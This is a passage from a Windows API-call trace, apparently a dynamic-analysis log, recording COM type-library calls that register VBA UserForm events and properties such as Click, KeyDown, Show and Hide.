wMajorVerNum=0x0, wMinorVerNum=0x0) returned 0x0 [0041.892] ITypeLib:RemoteGetDocumentation (in: This=0x6c93310, index=-1, refPtrFlags=0x1860a0, pbstrName=0x186130, pBstrDocString=0x186160, pdwHelpContext=0x186140, pBstrHelpFile=0x7fee42fde6e | out: pbstrName=0x186130*=0x0, pBstrDocString=0x186160*=0x0, pdwHelpContext=0x186140*=0x0, pBstrHelpFile=0x7fee42fde6e) returned 0x0 [0041.892] ICreateTypeLib:SetName (This=0x6c93b88, szName="F3Dynamic") returned 0x0 [0041.892] ICreateTypeLib:SetHelpContext (This=0x6c93b88, dwHelpContext=0x0) returned 0x0 [0041.892] IMalloc:Alloc (This=0x7feffc15380, cb=0xf8) returned 0x6c1e9b0 [0041.892] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a6e9a8, ppTypeAttr=0x185ff8, pDummy=0x186110 | out: ppTypeAttr=0x185ff8, pDummy=0x186110*=0x0) returned 0x0 [0041.892] ITypeInfo:GetImplTypeFlags (in: This=0x6a6e9a8, index=0x0, pImplTypeFlags=0x185fec | out: pImplTypeFlags=0x185fec*=1) returned 0x0 [0041.892] ITypeInfo:GetImplTypeFlags (in: This=0x6a6e9a8, index=0x1, pImplTypeFlags=0x185fec | out: pImplTypeFlags=0x185fec*=3) returned 0x0 [0041.892] ITypeInfo:GetRefTypeOfImplType (in: This=0x6a6e9a8, index=0x0, pRefType=0x185fac | out: pRefType=0x185fac*=0x0) returned 0x0 [0041.892] ITypeInfo:GetRefTypeInfo (in: This=0x6a6e9a8, hreftype=0x0, ppTInfo=0x185fa0 | out: ppTInfo=0x185fa0*=0x6a6e948) returned 0x0 [0041.892] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a6e948, ppTypeAttr=0x185ff0, pDummy=0x185f80 | out: ppTypeAttr=0x185ff0, pDummy=0x185f80*=0x186030) returned 0x0 [0041.892] ITypeInfo:LocalReleaseTypeAttr (This=0x6a6e948) returned 0x0 [0041.892] ITypeInfo:GetRefTypeOfImplType (in: This=0x6a6e9a8, index=0x1, pRefType=0x185fac | out: pRefType=0x185fac*=0x19) returned 0x0 [0041.892] ITypeInfo:GetRefTypeInfo (in: This=0x6a6e9a8, hreftype=0x19, ppTInfo=0x185f98 | out: ppTInfo=0x185f98*=0x6c6be98) returned 0x0 [0041.892] ITypeInfo:RemoteGetTypeAttr (in: This=0x6c6be98, ppTypeAttr=0x185fd8, pDummy=0x185f80 | out: ppTypeAttr=0x185fd8, pDummy=0x185f80*=0x186030) returned 0x0 [0041.892] ITypeInfo:LocalReleaseTypeAttr (This=0x6c6be98) returned 0x0 [0041.892] ITypeInfo:LocalReleaseTypeAttr (This=0x6a6e9a8) returned 0x0 [0041.892] ITypeInfo:RemoteGetTypeAttr (in: This=0x6c6be98, ppTypeAttr=0x186128, pDummy=0x6 | out: ppTypeAttr=0x186128, pDummy=0x6) returned 0x0 [0041.892] ITypeInfo:LocalReleaseTypeAttr (This=0x6c6be98) returned 0x0 [0041.893] wcscpy_s (in: _Destination=0x6bc38a0, _SizeInWords=0xb, _Source="Initialize" | out: _Destination="Initialize") returned 0x0 [0041.893] wcscpy_s (in: _Destination=0x6bc38d0, _SizeInWords=0x7, _Source="Resize" | out: _Destination="Resize") returned 0x0 [0041.893] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee4613260, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0041.893] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee4613260, cbMultiByte=-1, lpWideCharStr=0x6bc3868, cchWideChar=11 | out: lpWideCharStr="QueryClose") returned 11 [0041.893] IMalloc:Alloc (This=0x7feffc15380, cb=0x26) returned 0x6bc38f0 [0041.893] wcscpy_s (in: _Destination=0x6bc3900, _SizeInWords=0xb, _Source="QueryClose" | out: _Destination="QueryClose") returned 0x0 [0041.893] wcscpy_s (in: _Destination=0x6bc3930, _SizeInWords=0x9, _Source="Activate" | out: _Destination="Activate") returned 0x0 [0041.893] wcscpy_s (in: _Destination=0x6bc3960, _SizeInWords=0xb, _Source="Deactivate" | out: _Destination="Deactivate") returned 0x0 [0041.893] wcscpy_s (in: _Destination=0x6bc3990, _SizeInWords=0xa, _Source="Terminate" | out: _Destination="Terminate") returned 0x0 [0041.893] wcscpy_s (in: _Destination=0x6bc39c0, _SizeInWords=0x7, _Source="Object" | out: _Destination="Object") returned 0x0 [0041.893] IMalloc:Alloc (This=0x7feffc15380, cb=0x1a) returned 0x6bc39e0 [0041.893] wcscpy_s (in: _Destination=0x6bc39f0, _SizeInWords=0x5, _Source="Name" | out: _Destination="Name") returned 0x0 [0041.893] IMalloc:Alloc (This=0x7feffc15380, cb=0x1e) returned 0x6bc3a10 [0041.893] wcscpy_s (in: _Destination=0x6bc3a20, _SizeInWords=0x7, _Source="Parent" | out: _Destination="Parent") returned 0x0 [0041.893] IMalloc:Alloc (This=0x7feffc15380, cb=0x1e) returned 0x6bc3a40 [0041.893] wcscpy_s (in: _Destination=0x6bc3a50, _SizeInWords=0x7, _Source="Delete" | out: _Destination="Delete") returned 0x0 [0041.893] IMalloc:Alloc (This=0x7feffc15380, cb=0x1c) returned 0x6bc3a70 [0041.893] wcscpy_s (in: _Destination=0x6bc3a80, _SizeInWords=0x6, _Source="Index" | out: _Destination="Index") returned 0x0 [0041.893] wcscpy_s (in: _Destination=0x6bc3ab0, _SizeInWords=0x5, _Source="Name" | out: _Destination="Name") returned 0x0 [0041.893] wcscpy_s (in: _Destination=0x6bc3ae0, _SizeInWords=0x8, _Source="Caption" | out: _Destination="Caption") returned 0x0 [0041.893] wcscpy_s (in: _Destination=0x6bc3b10, _SizeInWords=0x8, _Source="Caption" | out: _Destination="Caption") returned 0x0 [0041.894] wcscpy_s (in: _Destination=0x6bc3b40, _SizeInWords=0x5, _Source="Left" | out: _Destination="Left") returned 0x0 [0041.894] wcscpy_s (in: _Destination=0x6bc3b70, _SizeInWords=0x5, _Source="Left" | out: _Destination="Left") returned 0x0 [0041.894] wcscpy_s (in: _Destination=0x6c32880, _SizeInWords=0x4, _Source="Top" | out: _Destination="Top") returned 0x0 [0041.894] wcscpy_s (in: _Destination=0x6c32980, _SizeInWords=0x4, _Source="Top" | out: _Destination="Top") returned 0x0 [0041.894] wcscpy_s (in: _Destination=0x6bc3ba0, _SizeInWords=0x6, _Source="Width" | out: _Destination="Width") returned 0x0 [0041.894] wcscpy_s (in: _Destination=0x6bc3bd0, _SizeInWords=0x6, _Source="Width" | out: _Destination="Width") returned 0x0 [0041.894] wcscpy_s (in: _Destination=0x6bc3c00, _SizeInWords=0x7, _Source="Height" | out: _Destination="Height") returned 0x0 [0041.894] wcscpy_s (in: _Destination=0x6bc3c30, _SizeInWords=0x7, _Source="Height" | out: _Destination="Height") returned 0x0 [0041.894] wcscpy_s (in: _Destination=0x6bc3c60, _SizeInWords=0x8, _Source="Enabled" | out: _Destination="Enabled") returned 0x0 [0041.894] wcscpy_s (in: _Destination=0x6bc3c90, _SizeInWords=0x8, _Source="Enabled" | out: _Destination="Enabled") returned 0x0 [0041.894] wcscpy_s (in: _Destination=0x6bc3cc0, _SizeInWords=0x8, _Source="Visible" | out: _Destination="Visible") returned 0x0 [0041.894] wcscpy_s (in: _Destination=0x6c346a0, _SizeInWords=0x4, _Source="Tag" | out: _Destination="Tag") returned 0x0 [0041.894] wcscpy_s (in: _Destination=0x6c346c0, _SizeInWords=0x4, _Source="Tag" | out: _Destination="Tag") returned 0x0 [0041.894] wcscpy_s (in: _Destination=0x6880740, _SizeInWords=0xe, _Source="HelpContextID" | out: _Destination="HelpContextID") returned 0x0 [0041.894] wcscpy_s (in: _Destination=0x6880700, _SizeInWords=0xe, _Source="HelpContextID" | out: _Destination="HelpContextID") returned 0x0 [0041.894] wcscpy_s (in: _Destination=0x68806c0, _SizeInWords=0x10, _Source="WhatsThisButton" | out: _Destination="WhatsThisButton") returned 0x0 [0041.895] wcscpy_s (in: _Destination=0x6880680, _SizeInWords=0xe, _Source="WhatsThisHelp" | out: _Destination="WhatsThisHelp") returned 0x0 [0041.895] wcscpy_s (in: _Destination=0x6bc3cf0, _SizeInWords=0xc, _Source="RightToLeft" | out: _Destination="RightToLeft") returned 0x0 [0041.895] wcscpy_s (in: _Destination=0x6bc3d20, _SizeInWords=0xc, _Source="RightToLeft" | out: _Destination="RightToLeft") returned 0x0 [0041.895] wcscpy_s (in: _Destination=0x6880640, _SizeInWords=0x10, _Source="StartUpPosition" | out: _Destination="StartUpPosition") returned 0x0 [0041.895] wcscpy_s (in: _Destination=0x6880600, _SizeInWords=0x10, _Source="StartUpPosition" | out: _Destination="StartUpPosition") returned 0x0 [0041.895] LoadStringA (in: hInstance=0x7fef92d0000, uID=0x3431, lpBuffer=0x183e60, cchBufferMax=512 | out: lpBuffer="Left\x7fTop\x7fWidth\x7fHeight\x7f\x7f") returned 0x17 [0041.895] wcscpy_s (in: _Destination=0x6bc3d50, _SizeInWords=0x5, _Source="Move" | out: _Destination="Move") returned 0x0 [0041.895] LoadStringA (in: hInstance=0x7fef92d0000, uID=0x3453, lpBuffer=0x183e60, cchBufferMax=512 | out: lpBuffer="Modal\x7f\x7f") returned 0x7 [0041.895] wcscpy_s (in: _Destination=0x6bc3d80, _SizeInWords=0x5, _Source="Show" | out: _Destination="Show") returned 0x0 [0041.895] wcscpy_s (in: _Destination=0x6bc3db0, _SizeInWords=0x5, _Source="Hide" | out: _Destination="Hide") returned 0x0 [0041.895] wcscpy_s (in: _Destination=0x6bc3de0, _SizeInWords=0xa, _Source="PrintForm" | out: _Destination="PrintForm") returned 0x0 [0041.896] wcscpy_s (in: _Destination=0x68805c0, _SizeInWords=0xe, _Source="WhatsThisMode" | out: _Destination="WhatsThisMode") returned 0x0 [0041.896] wcscpy_s (in: _Destination=0x6bc3e10, _SizeInWords=0x7, _Source="Object" | out: _Destination="Object") returned 0x0 [0041.896] IMalloc:Alloc (This=0x7feffc15380, cb=0x1a) returned 0x6bc3e30 [0041.896] wcscpy_s (in: _Destination=0x6bc3e40, _SizeInWords=0x5, _Source="Name" | out: _Destination="Name") returned 0x0 [0041.896] IMalloc:Alloc (This=0x7feffc15380, cb=0x1e) returned 0x6bc3e60 [0041.896] wcscpy_s (in: _Destination=0x6bc3e70, _SizeInWords=0x7, _Source="Parent" | out: _Destination="Parent") returned 0x0 [0041.896] IMalloc:Alloc (This=0x7feffc15380, cb=0x1e) returned 0x6bc3e90 [0041.896] wcscpy_s (in: _Destination=0x6bc3ea0, _SizeInWords=0x7, _Source="Delete" | out: _Destination="Delete") returned 0x0 [0041.896] IMalloc:Alloc (This=0x7feffc15380, cb=0x1c) returned 0x6bc3ec0 [0041.896] wcscpy_s (in: _Destination=0x6bc3ed0, _SizeInWords=0x6, _Source="Index" | out: _Destination="Index") returned 0x0 [0041.896] ITypeInfo:RemoteGetTypeAttr (in: This=0x6c6be98, ppTypeAttr=0x185fb8, pDummy=0x6c93b88 | out: ppTypeAttr=0x185fb8, pDummy=0x6c93b88*=0xffe23ae0) returned 0x0 [0041.896] ITypeInfo:RemoteGetDocumentation (in: This=0x6c6be98, memid=-1, refPtrFlags=0x185fd8, pbstrName=0x185fd0, pBstrDocString=0x185fe0, pdwHelpContext=0x0, pBstrHelpFile=0x7fe00000000 | out: pbstrName=0x185fd0*=0x0, pBstrDocString=0x185fe0, pdwHelpContext=0x0, pBstrHelpFile=0x7fe00000000) returned 0x0 [0041.896] ICreateTypeLib:CreateTypeInfo (in: This=0x6c93b88, szName="FormEvents", tkind=4, ppCTInfo=0x186090 | out: ppCTInfo=0x186090*=0x6ccf070) returned 0x0 [0041.896] ICreateTypeInfo:SetHelpContext (This=0x6ccf070, dwHelpContext=0x0) returned 0x0 [0041.896] ICreateTypeInfo:SetVersion (This=0x6ccf070, wMajorVerNum=0x0, wMinorVerNum=0x0) returned 0x0 [0041.896] ICreateTypeInfo:SetAlignment (This=0x6ccf070, cbAlignment=0x8) returned 0x0 [0041.896] ICreateTypeInfo:SetTypeFlags (This=0x6ccf070, uTypeFlags=0x5010) returned 0x0 [0041.896] ICreateTypeInfo:SetGuid (This=0x6ccf070, GUID=0x186010*(Data1=0x5b9d8fc8, Data2=0x4a71, Data3=0x101b, Data4=([0]=0x97, [1]=0xa6, [2]=0x0, [3]=0x0, [4]=0xb, [5]=0x65, [6]=0xc0, [7]=0x8b))) returned 0x0 [0041.896] ITypeInfo:LocalReleaseTypeAttr (This=0x6c6be98) returned 0x0 [0041.896] IUnknown:QueryInterface (in: This=0x6ccf070, riid=0x7fee45e2ac8*(Data1=0x20401, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1860b0 | out: ppvObject=0x1860b0*=0x6ccf078) returned 0x0 [0041.896] IUnknown:QueryInterface (in: This=0x6c6be98, riid=0x7fee45e2ac8*(Data1=0x20401, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x186020 | out: ppvObject=0x186020*=0x6c6be98) returned 0x0 [0041.897] IUnknown:QueryInterface (in: This=0x6ccf078, riid=0x7fee45e2ac8*(Data1=0x20401, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x186020 | out: ppvObject=0x186020*=0x6ccf078) returned 0x0 [0041.897] IMalloc:Realloc (This=0x7feffc15380, pv=0x0, cb=0x50) returned 0x6ccf0d0 [0041.897] IMalloc:Realloc (This=0x7feffc15380, pv=0x0, cb=0x50) returned 0x6ccf130 [0041.897] IUnknown:Release (This=0x6ccf078) returned 0x2 [0041.897] ITypeInfo:RemoteGetTypeAttr (in: This=0x6c6be98, ppTypeAttr=0x185f50, pDummy=0x185fe8 | out: ppTypeAttr=0x185f50, pDummy=0x185fe8*=0x0) returned 0x0 [0041.897] ITypeInfo:RemoteGetFuncDesc (in: This=0x6c6be98, index=0x0, ppFuncDesc=0x185f38, pDummy=0x0 | out: ppFuncDesc=0x185f38, pDummy=0x0) returned 0x0 [0041.897] ITypeInfo:RemoteGetNames (in: This=0x6c6be98, memid=768, rgBstrNames=0x185f28, cMaxNames=0x1, pcNames=0x185f48 | out: rgBstrNames=0x185f28*="AddControl", pcNames=0x185f48*=0x1) returned 0x0 [0041.897] IMalloc:Alloc (This=0x7feffc15380, cb=0x26) returned 0x6bc37d0 [0041.897] wcscpy_s (in: _Destination=0x6bc37e0, _SizeInWords=0xb, _Source="AddControl" | out: _Destination="AddControl") returned 0x0 [0041.897] ITypeInfo:LocalReleaseFuncDesc (This=0x6c6be98) returned 0x0 [0041.897] ITypeInfo:RemoteGetFuncDesc (in: This=0x6c6be98, index=0x1, ppFuncDesc=0x185f38, pDummy=0xa0 | out: ppFuncDesc=0x185f38, pDummy=0xa0) returned 0x0 [0041.897] ITypeInfo:RemoteGetNames (in: This=0x6c6be98, memid=3, rgBstrNames=0x185f28, cMaxNames=0x1, pcNames=0x185f48 | out: rgBstrNames=0x185f28*="BeforeDragOver", pcNames=0x185f48*=0x1) returned 0x0 [0041.897] IMalloc:Alloc (This=0x7feffc15380, cb=0x2e) returned 0x6880570 [0041.897] wcscpy_s (in: _Destination=0x6880580, _SizeInWords=0xf, _Source="BeforeDragOver" | out: _Destination="BeforeDragOver") returned 0x0 [0041.897] ITypeInfo:LocalReleaseFuncDesc (This=0x6c6be98) returned 0x0 [0041.897] ITypeInfo:RemoteGetFuncDesc (in: This=0x6c6be98, index=0x2, ppFuncDesc=0x185f38, pDummy=0x140 | out: ppFuncDesc=0x185f38, pDummy=0x140) returned 0x0 [0041.897] ITypeInfo:RemoteGetNames (in: This=0x6c6be98, memid=4, rgBstrNames=0x185f28, cMaxNames=0x1, pcNames=0x185f48 | out: rgBstrNames=0x185f28*="BeforeDropOrPaste", pcNames=0x185f48*=0x1) returned 0x0 [0041.897] IMalloc:Alloc (This=0x7feffc15380, cb=0x34) returned 0x6880530 [0041.897] wcscpy_s (in: _Destination=0x6880540, _SizeInWords=0x12, _Source="BeforeDropOrPaste" | out: _Destination="BeforeDropOrPaste") returned 0x0 [0041.897] ITypeInfo:LocalReleaseFuncDesc (This=0x6c6be98) returned 0x0 [0041.897] ITypeInfo:RemoteGetFuncDesc (in: This=0x6c6be98, index=0x3, ppFuncDesc=0x185f38, pDummy=0x140 | out: ppFuncDesc=0x185f38, pDummy=0x140) returned 0x0 [0041.897] ITypeInfo:RemoteGetNames (in: This=0x6c6be98, memid=-600, rgBstrNames=0x185f28, cMaxNames=0x1, pcNames=0x185f48 | out: rgBstrNames=0x185f28*="Click", pcNames=0x185f48*=0x1) returned 0x0 [0041.897] IMalloc:Alloc (This=0x7feffc15380, cb=0x1c) returned 0x6bc3830 [0041.897] wcscpy_s (in: _Destination=0x6bc3840, _SizeInWords=0x6, _Source="Click" | out: _Destination="Click") returned 0x0 [0041.897] ITypeInfo:LocalReleaseFuncDesc (This=0x6c6be98) returned 0x0 [0041.897] ITypeInfo:RemoteGetFuncDesc (in: This=0x6c6be98, index=0x4, ppFuncDesc=0x185f38, pDummy=0xa0 | out: ppFuncDesc=0x185f38, pDummy=0xa0) returned 0x0 [0041.897] ITypeInfo:RemoteGetNames (in: This=0x6c6be98, memid=-601, rgBstrNames=0x185f28, cMaxNames=0x1, pcNames=0x185f48 | out: rgBstrNames=0x185f28*="DblClick", pcNames=0x185f48*=0x1) returned 0x0 [0041.897] IMalloc:Alloc (This=0x7feffc15380, cb=0x22) returned 0x6bc3ef0 [0041.897] wcscpy_s (in: _Destination=0x6bc3f00, _SizeInWords=0x9, _Source="DblClick" | out: _Destination="DblClick") returned 0x0 [0041.897] ITypeInfo:LocalReleaseFuncDesc (This=0x6c6be98) returned 0x0 [0041.897] ITypeInfo:RemoteGetFuncDesc (in: This=0x6c6be98, index=0x5, ppFuncDesc=0x185f38, pDummy=0xa0 | out: ppFuncDesc=0x185f38, pDummy=0xa0) returned 0x0 [0041.897] ITypeInfo:RemoteGetNames (in: This=0x6c6be98, memid=-608, rgBstrNames=0x185f28, cMaxNames=0x1, pcNames=0x185f48 | out: rgBstrNames=0x185f28*="Error", pcNames=0x185f48*=0x1) returned 0x0 [0041.897] IMalloc:Alloc (This=0x7feffc15380, cb=0x1c) returned 0x6bc3f20 [0041.897] wcscpy_s (in: _Destination=0x6bc3f30, _SizeInWords=0x6, _Source="Error" | out: _Destination="Error") returned 0x0 [0041.897] ITypeInfo:LocalReleaseFuncDesc (This=0x6c6be98) returned 0x0 [0041.898] ITypeInfo:RemoteGetFuncDesc (in: This=0x6c6be98, index=0x6, ppFuncDesc=0x185f38, pDummy=0x140 | out: ppFuncDesc=0x185f38, pDummy=0x140) returned 0x0 [0041.898] ITypeInfo:RemoteGetNames (in: This=0x6c6be98, memid=-602, rgBstrNames=0x185f28, cMaxNames=0x1, pcNames=0x185f48 | out: rgBstrNames=0x185f28*="KeyDown", pcNames=0x185f48*=0x1) returned 0x0 [0041.898] IMalloc:Alloc (This=0x7feffc15380, cb=0x20) returned 0x6bc3f50 [0041.898] wcscpy_s (in: _Destination=0x6bc3f60, _SizeInWords=0x8, _Source="KeyDown" | out: _Destination="KeyDown") returned 0x0 [0041.898] ITypeInfo:LocalReleaseFuncDesc (This=0x6c6be98) returned 0x0 [0041.898] ITypeInfo:RemoteGetFuncDesc (in: This=0x6c6be98, index=0x7, ppFuncDesc=0x185f38, pDummy=0x70 | out: ppFuncDesc=0x185f38, pDummy=0x70) returned 0x0 [0041.898] ITypeInfo:RemoteGetNames (in: This=0x6c6be98, memid=-603, rgBstrNames=0x185f28, cMaxNames=0x1, pcNames=0x185f48 | out: rgBstrNames=0x185f28*="KeyPress", pcNames=0x185f48*=0x1) returned 0x0 [0041.898] IMalloc:Alloc (This=0x7feffc15380, cb=0x22) returned 0x6bc3f80 [0041.898] wcscpy_s (in: _Destination=0x6bc3f90, _SizeInWords=0x9, _Source="KeyPress" | out: _Destination="KeyPress") returned 0x0 [0041.898] ITypeInfo:LocalReleaseFuncDesc (This=0x6c6be98) returned 0x0 [0041.898] ITypeInfo:RemoteGetFuncDesc (in: This=0x6c6be98, index=0x8, ppFuncDesc=0x185f38, pDummy=0xa0 | out: ppFuncDesc=0x185f38, pDummy=0xa0) returned 0x0 [0041.898] ITypeInfo:RemoteGetNames (in: This=0x6c6be98, memid=-604, rgBstrNames=0x185f28, cMaxNames=0x1, pcNames=0x185f48 | out: rgBstrNames=0x185f28*="KeyUp", pcNames=0x185f48*=0x1) returned 0x0 [0041.898] IMalloc:Alloc (This=0x7feffc15380, cb=0x1c) returned 0x6bc3fb0 [0041.898] wcscpy_s (in: _Destination=0x6bc3fc0, _SizeInWords=0x6, _Source="KeyUp" | out: _Destination="KeyUp") returned 0x0 [0041.898] ITypeInfo:LocalReleaseFuncDesc (This=0x6c6be98) returned 0x0 [0041.898] ITypeInfo:RemoteGetFuncDesc (in: This=0x6c6be98, index=0x9, ppFuncDesc=0x185f38, pDummy=0x70 | out: ppFuncDesc=0x185f38, pDummy=0x70) returned 0x0 [0041.898] ITypeInfo:RemoteGetNames (in: This=0x6c6be98, memid=770, rgBstrNames=0x185f28, cMaxNames=0x1, pcNames=0x185f48 | out: rgBstrNames=0x185f28*="Layout", pcNames=0x185f48*=0x1) returned 0x0 [0041.898] IMalloc:Alloc (This=0x7feffc15380, cb=0x1e) returned 0x6bc3fe0 [0041.898] wcscpy_s (in: _Destination=0x6bc3ff0, _SizeInWords=0x7, _Source="Layout" | out: _Destination="Layout") returned 0x0 [0041.898] ITypeInfo:LocalReleaseFuncDesc (This=0x6c6be98) returned 0x0 [0041.898] ITypeInfo:RemoteGetFuncDesc (in: This=0x6c6be98, index=0xa, ppFuncDesc=0x185f38, pDummy=0xa0 | out: ppFuncDesc=0x185f38, pDummy=0xa0) returned 0x0 [0041.898] ITypeInfo:RemoteGetNames (in: This=0x6c6be98, memid=-605, rgBstrNames=0x185f28, cMaxNames=0x1, pcNames=0x185f48 | out: rgBstrNames=0x185f28*="MouseDown", pcNames=0x185f48*=0x1) returned 0x0 [0041.898] IMalloc:Alloc (This=0x7feffc15380, cb=0x24) returned 0x6bc4010 [0041.898] wcscpy_s (in: _Destination=0x6bc4020, _SizeInWords=0xa, _Source="MouseDown" | out: _Destination="MouseDown") returned 0x0 [0041.898] ITypeInfo:LocalReleaseFuncDesc (This=0x6c6be98) returned 0x0 [0041.898] ITypeInfo:RemoteGetFuncDesc (in: This=0x6c6be98, index=0xb, ppFuncDesc=0x185f38, pDummy=0x70 | out: ppFuncDesc=0x185f38, pDummy=0x70) returned 0x0 [0041.898] ITypeInfo:RemoteGetNames (in: This=0x6c6be98, memid=-606, rgBstrNames=0x185f28, cMaxNames=0x1, pcNames=0x185f48 | out: rgBstrNames=0x185f28*="MouseMove", pcNames=0x185f48*=0x1) returned 0x0 [0041.898] IMalloc:Alloc (This=0x7feffc15380, cb=0x24) returned 0x6bc4040 [0041.898] wcscpy_s (in: _Destination=0x6bc4050, _SizeInWords=0xa, _Source="MouseMove" | out: _Destination="MouseMove") returned 0x0 [0041.898] ITypeInfo:LocalReleaseFuncDesc (This=0x6c6be98) returned 0x0 [0041.898] ITypeInfo:RemoteGetFuncDesc (in: This=0x6c6be98, index=0xc, ppFuncDesc=0x185f38, pDummy=0x70 | out: ppFuncDesc=0x185f38, pDummy=0x70) returned 0x0 [0041.898] ITypeInfo:RemoteGetNames (in: This=0x6c6be98, memid=-607, rgBstrNames=0x185f28, cMaxNames=0x1, pcNames=0x185f48 | out: rgBstrNames=0x185f28*="MouseUp", pcNames=0x185f48*=0x1) returned 0x0 [0041.898] IMalloc:Alloc (This=0x7feffc15380, cb=0x20) returned 0x6bc4070 [0041.898] wcscpy_s (in: _Destination=0x6bc4080, _SizeInWords=0x8, _Source="MouseUp" | out: _Destination="MouseUp") returned 0x0 [0041.898] ITypeInfo:LocalReleaseFuncDesc (This=0x6c6be98) returned 0x0 [0041.899] ITypeInfo:RemoteGetFuncDesc (in: This=0x6c6be98, index=0xd, ppFuncDesc=0x185f38, pDummy=0x70 | out: ppFuncDesc=0x185f38, pDummy=0x70) returned 0x0 [0041.899] ITypeInfo:RemoteGetNames (in: This=0x6c6be98, memid=771, rgBstrNames=0x185f28, cMaxNames=0x1, pcNames=0x185f48 | out: rgBstrNames=0x185f28*="RemoveControl", pcNames=0x185f48*=0x1) returned 0x0 [0041.899] IMalloc:Alloc (This=0x7feffc15380, cb=0x2c) returned 0x68804f0 [0041.899] wcscpy_s (in: _Destination=0x6880500, _SizeInWords=0xe, _Source="RemoveControl" | out: _Destination="RemoveControl") returned 0x0 [0041.899] ITypeInfo:LocalReleaseFuncDesc (This=0x6c6be98) returned 0x0 [0041.899] ITypeInfo:RemoteGetFuncDesc (in: This=0x6c6be98, index=0xe, ppFuncDesc=0x185f38, pDummy=0xa0 | out: ppFuncDesc=0x185f38, pDummy=0xa0) returned 0x0 [0041.899] ITypeInfo:RemoteGetNames (in: This=0x6c6be98, memid=772, rgBstrNames=0x185f28, cMaxNames=0x1, pcNames=0x185f48 | out: rgBstrNames=0x185f28*="Scroll", pcNames=0x185f48*=0x1) returned 0x0 [0041.899] IMalloc:Alloc (This=0x7feffc15380, cb=0x1e) returned 0x6bc40a0 [0041.899] wcscpy_s (in: _Destination=0x6bc40b0, _SizeInWords=0x7, _Source="Scroll" | out: _Destination="Scroll") returned 0x0 [0041.899] ITypeInfo:LocalReleaseFuncDesc (This=0x6c6be98) returned 0x0 [0041.899] ITypeInfo:RemoteGetFuncDesc (in: This=0x6c6be98, index=0xf, ppFuncDesc=0x185f38, pDummy=0x140 | out: ppFuncDesc=0x185f38, pDummy=0x140) returned 0x0 [0041.899] ITypeInfo:RemoteGetNames (in: This=0x6c6be98, memid=773, rgBstrNames=0x185f28, cMaxNames=0x1, pcNames=0x185f48 | out: rgBstrNames=0x185f28*="Zoom", pcNames=0x185f48*=0x1) returned 0x0 [0041.899] IMalloc:Alloc (This=0x7feffc15380, cb=0x1a) returned 0x6bc40d0 [0041.899] wcscpy_s (in: _Destination=0x6bc40e0, _SizeInWords=0x5, _Source="Zoom" | out: _Destination="Zoom") returned 0x0 [0041.899] ITypeInfo:LocalReleaseFuncDesc (This=0x6c6be98) returned 0x0 [0041.899] ITypeInfo:LocalReleaseTypeAttr (This=0x6c6be98) returned 0x0 [0041.899] ITypeInfo:RemoteGetTypeAttr (in: This=0x6c6be98, ppTypeAttr=0x185f60, pDummy=0x186000 | out: ppTypeAttr=0x185f60, pDummy=0x186000*=0x0) returned 0x0 [0041.899] ITypeInfo:RemoteGetFuncDesc (in: This=0x6c6be98, index=0x0, ppFuncDesc=0x185f50, pDummy=0x0 | out: ppFuncDesc=0x185f50, pDummy=0x0) returned 0x0 [0041.899] IMalloc:Alloc (This=0x7feffc15380, cb=0x400) returned 0x6d087f0 [0041.899] IMalloc:Alloc (This=0x7feffc15380, cb=0x10) returned 0x6c346d0 [0041.899] ITypeInfo:LocalReleaseFuncDesc (This=0x6c6be98) returned 0x0 [0041.899] ITypeInfo:RemoteGetFuncDesc (in: This=0x6c6be98, index=0x1, ppFuncDesc=0x185f50, pDummy=0xc0 | out: ppFuncDesc=0x185f50, pDummy=0xc0) returned 0x0 [0041.899] IMalloc:Alloc (This=0x7feffc15380, cb=0x10) returned 0x6c346f0 [0041.899] ITypeInfo:LocalReleaseFuncDesc (This=0x6c6be98) returned 0x0 [0041.899] ITypeInfo:RemoteGetFuncDesc (in: This=0x6c6be98, index=0x2, ppFuncDesc=0x185f50, pDummy=0x140 | out: ppFuncDesc=0x185f50, pDummy=0x140) returned 0x0 [0041.899] IMalloc:Alloc (This=0x7feffc15380, cb=0x10) returned 0x6c34710 [0041.899] ITypeInfo:LocalReleaseFuncDesc (This=0x6c6be98) returned 0x0 [0041.899] ITypeInfo:RemoteGetFuncDesc (in: This=0x6c6be98, index=0x3, ppFuncDesc=0x185f50, pDummy=0x140 | out: ppFuncDesc=0x185f50, pDummy=0x140) returned 0x0 [0041.899] IMalloc:Alloc (This=0x7feffc15380, cb=0x10) returned 0x6c34730 [0041.899] ITypeInfo:LocalReleaseFuncDesc (This=0x6c6be98) returned 0x0 [0041.899] ITypeInfo:RemoteGetFuncDesc (in: This=0x6c6be98, index=0x4, ppFuncDesc=0x185f50, pDummy=0xc0 | out: ppFuncDesc=0x185f50, pDummy=0xc0) returned 0x0 [0041.899] IMalloc:Alloc (This=0x7feffc15380, cb=0x10) returned 0x6c34750 [0041.899] ITypeInfo:LocalReleaseFuncDesc (This=0x6c6be98) returned 0x0 [0041.899] ITypeInfo:RemoteGetFuncDesc (in: This=0x6c6be98, index=0x5, ppFuncDesc=0x185f50, pDummy=0xc0 | out: ppFuncDesc=0x185f50, pDummy=0xc0) returned 0x0 [0041.899] IMalloc:Alloc (This=0x7feffc15380, cb=0x10) returned 0x6c34770 [0041.899] ITypeInfo:LocalReleaseFuncDesc (This=0x6c6be98) returned 0x0 [0041.899] ITypeInfo:RemoteGetFuncDesc (in: This=0x6c6be98, index=0x6, ppFuncDesc=0x185f50, pDummy=0x140 | out: ppFuncDesc=0x185f50, pDummy=0x140) returned 0x0 [0041.899] IMalloc:Alloc (This=0x7feffc15380, cb=0x10) returned 0x6c34790 [0041.899] ITypeInfo:LocalReleaseFuncDesc (This=0x6c6be98) returned 0x0 [0041.899] ITypeInfo:RemoteGetFuncDesc (in: 